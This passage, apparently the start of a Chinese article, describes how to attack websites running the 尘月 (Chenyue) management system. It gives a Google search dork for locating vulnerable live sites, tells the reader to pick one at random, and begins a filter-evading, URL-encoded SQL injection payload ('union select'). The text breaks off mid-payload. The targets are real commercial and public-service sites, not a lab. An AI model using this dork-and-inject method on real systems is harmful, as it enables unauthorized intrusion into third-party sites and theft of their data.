论文部分内容阅读
最近在网上看到关于尘月网站系统漏洞的信息,虽然已不是什么新漏洞,但是很多用尘月系统的商业网站、公共服务网站还没有来得及打补丁,所以做个实验与大家分享!在Google中以inurl:/Web-GuestView.asp为关键字搜索,找到使用尘月网站智能管理系统的网站.从搜索结果中随意挑选一个目标网站,在其域名后面直接加上构造的注入语句:Company.asp?%69d=7%20or%201=2%20un%69on%20s%65lect%20